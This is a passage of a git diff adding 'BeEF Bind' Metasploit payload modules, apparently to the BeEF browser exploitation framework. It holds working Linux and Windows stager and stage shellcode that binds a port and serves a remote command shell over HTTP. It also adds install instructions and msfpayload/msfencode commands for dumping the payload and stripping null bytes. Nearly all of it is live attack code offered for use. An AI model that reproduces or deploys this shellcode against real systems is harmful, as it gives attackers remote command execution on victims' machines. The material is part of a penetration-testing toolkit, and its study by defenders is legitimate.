+						"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" +
+						"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" +
+						"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" +
+						"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" +
+						"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" +
+						"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" +
+						"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" +
+						"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" +
+						"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" +
+						"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" +
+						"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" +
+						"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" +
+						"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" +
+						"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" +
+						"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" +
+						"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" +
+						"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" +
+						"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" +
+						"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" +
+						"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" +
+						"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
+						"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" +
+						"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" +
+						"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" +
+						"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" +
+						"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" +
+						"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" +
+						"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" +
+						"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" +
+						"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" +
+						"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" +
+						"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" +
+						"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" +
+						"\xf6\x48\x31\xd2\x0f\x05"
+				}
+			))
+	end
+
+	# Stage encoding is safe for this payload
+	def encode_stage?
+		true
+	end
+end
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb
new file mode 100644
index 000000000..bbb9e715f
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb
@@ -0,0 +1,84 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Linux
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind Linux Command Shell Stage (stage x86)',
+			'Description'   => 'Spawn a piped command shell (staged) with an HTTP interface',
+			'Author'        => [ 'Bart Leppens' ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadCompat' =>
+				{
+					'Convention' => 'beef_bind'
+				},
+			'Stage'         =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 168, 'n' ]
+						},
+					'Payload' =>
+						"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" +
+						"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" +
+						"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" +
+						"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" +
+						"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" +
+						"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" +
+						"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" +
+						"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" +
+						"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" +
+						"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" +
+						"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" +
+						"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" +
+						"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" +
+						"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" +
+						"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" +
+						"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" +
+						"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" +
+						"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" +
+						"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" +
+						"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" +
+						"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" +
+						"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" +
+						"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" +
+						"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" +
+						"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" +
+						"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" +
+						"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
+						"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" +
+						"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" +
+						"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" +
+						"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" +
+						"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" +
+						"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" +
+						"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" +
+						"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" +
+						"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" +
+						"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" +
+						"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
+				}
+			))
+	end
+
+	# Stage encoding is safe for this payload
+	def encode_stage?
+		true
+	end
+end
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb
new file mode 100644
index 000000000..c9dc7767d
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb
@@ -0,0 +1,137 @@
+##
+# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Windows
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind Windows Command Shell Stage (stager)',
+			'Version'       => '$Revision: 11421 $',
+			'Description'   => 'Spawn a piped command shell (staged) with an HTTP interface',
+			'Author'        => [ 'Ty Miller' ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86,
+			'Session'       => Msf::Sessions::CommandShellWindows,
+			'PayloadCompat' =>
+				{
+					'Convention' => 'beef_bind'
+				},
+			'Stage'         =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 511, 'n' ]
+						},
+					'Payload' =>
+						"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" +
+						"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" +
+						"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +
+						"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" +
+						"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" +
+						"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +
+						"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
+						"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
+						"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +
+						"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" +
+
+						"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" +
+						"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +
+						"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" +
+						"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
+						"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" +
+						"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" +
+						"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" +
+						"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" +
+						"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" +
+						"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" +
+
+						"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" +
+						"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" +
+						"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" +
+						"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" +
+						"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" +
+						"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" +
+						"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" +
+						"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" +
+						"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" +
+						"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
+
+						"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" +
+						"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
+						"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" +
+						"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" +
+						"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" +
+						"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" +
+						"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" +
+						"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" +
+						"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" +
+						"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" +
+
+						"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" +
+						"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" +
+						"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
+						"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" +
+						"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" +
+						"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" +
+						"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" +
+						"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" +
+						"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" +
+						"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +
+
+						"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" +
+						"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
+						"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" +
+						"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" +
+						"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" +
+						"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" +
+						"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" +
+						"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" +
+						"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
+						"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" +
+
+						"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" +
+						"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" +
+						"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" +
+						"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" +
+						"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" +
+						"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" +
+						"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" +
+						"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" +
+						"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" +
+						"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" +
+
+						"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" +
+						"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" +
+						"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" +
+						"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" +
+						"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" +
+						"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" +
+						"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" +
+						"\xff\xd5\xe9\x58\xfe\xff\xff"
+				}
+			))
+	end
+
+	# Stage encoding is safe for this payload
+	def encode_stage?
+		true
+	end
+end
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb
new file mode 100644
index 000000000..4ef9a5b10
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb
@@ -0,0 +1,49 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind HTTP Stager',
+			'Description'   => 'Proxy web requests between a web browser and a shell',
+			'Author'        => ['Bart Leppens'],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X64,
+			'Handler'       => Msf::Handler::BeEFBind,
+			'Convention'    => 'beef_bind',
+			'Stager'        =>
+				{
+					'RequiresMidstager' => false,
+					'Offsets' => { 'LPORT' => [ 54, 'n' ] },
+					'Payload' =>
+						"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
+						"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
+						"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
+						"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
+						"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
+						"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
+						"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
+						"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
+						"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
+						"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
+						"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
+						"\x01\xc6\xff\xe6"
+				}
+			))
+	end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb
new file mode 100644
index 000000000..7174e7498
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb
@@ -0,0 +1,47 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind HTTP Stager',
+			'Description'   => 'Proxy web requests between a web browser and a shell',
+			'Author'        => ['Bart Leppens'],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BeEFBind,
+			'Convention'    => 'beef_bind',
+			'Stager'        =>
+				{
+					'RequiresMidstager' => false,
+					'Offsets' => { 'LPORT' => [ 47, 'n' ] },
+					'Payload' =>
+						"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
+						"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
+						"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
+						"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
+						"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
+						"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
+						"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
+						"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
+						"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
+						"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
+				}
+			))
+	end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb
new file mode 100644
index 000000000..a8ae2da82
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb
@@ -0,0 +1,62 @@
+##
+# $Id: beef_bind-stager.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Windows
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind HTTP Stager',
+			'Version'       => '$Revision: 9179 $',
+			'Description'   => 'Proxy web requests between a web browser and a shell',
+			'Author'        => ['Ty Miller'],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BeEFBind,
+			'Convention'    => 'beef_bind',
+			'Stager'        =>
+				{
+					'RequiresMidstager' => false,
+					'Offsets' => { 'LPORT' => [ 200, 'n' ] },
+					'Payload' =>
+						# Length: 299 bytes
+						"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
+						"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
+						"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
+						"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
+						"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
+						"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
+						"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
+						"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
+						"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
+						"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
+						"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
+						"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
+						"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
+						"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
+						"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
+						"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
+						"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
+						"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
+						"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
+				}
+			))
+	end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt
new file mode 100644
index 000000000..d1c0fc2ff
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt
@@ -0,0 +1,37 @@
+
+Install into Metasploit on BackTrack:
+
+cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb 
+cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb 
+cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb 
+cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb
+cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb
+cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb
+cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb
+
+Check it works:
+
+msfpayload -l | grep beef_bind
+
+
+Get info on the payload:
+
+msfpayload windows/beef_shell/beef_bind S
+
+
+Dump stager and stage in C format:
+
+msfpayload windows/beef_shell/beef_bind C
+
+
+Dump stager in raw format:
+
+msfpayload windows/beef_shell/beef_bind R > beef_bind-stager
+
+
+Encode stager to remove nulls:
+
+msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'
+
+
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm
new file mode 100644
index 000000000..43325cf76
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm
@@ -0,0 +1,12 @@
+
+[SECTION .text]
+BITS 32
+[ORG 0]					;code starts at offset 0 
+
+	cld				;clear the direction flag
+	call start			;jump over block_api and push its address onto the stack
+%include "src/block_api.asm"
+start:
+	pop ebp				;pop the address of block_api into ebp for calling functions later
+%include "src/block_beef_bind-stage.asm"	;setup web listener to proxy requests and responses to the shell
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm
new file mode 100644
index 000000000..5dc580486
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm
@@ -0,0 +1,12 @@
+
+[SECTION .text]
+BITS 32
+[ORG 0]					;code starts at offset 0 
+
+	cld				;clear the direction flag
+	call start			;jump over block_api and push its address onto the stack
+%include "src/block_api.asm"
+start:
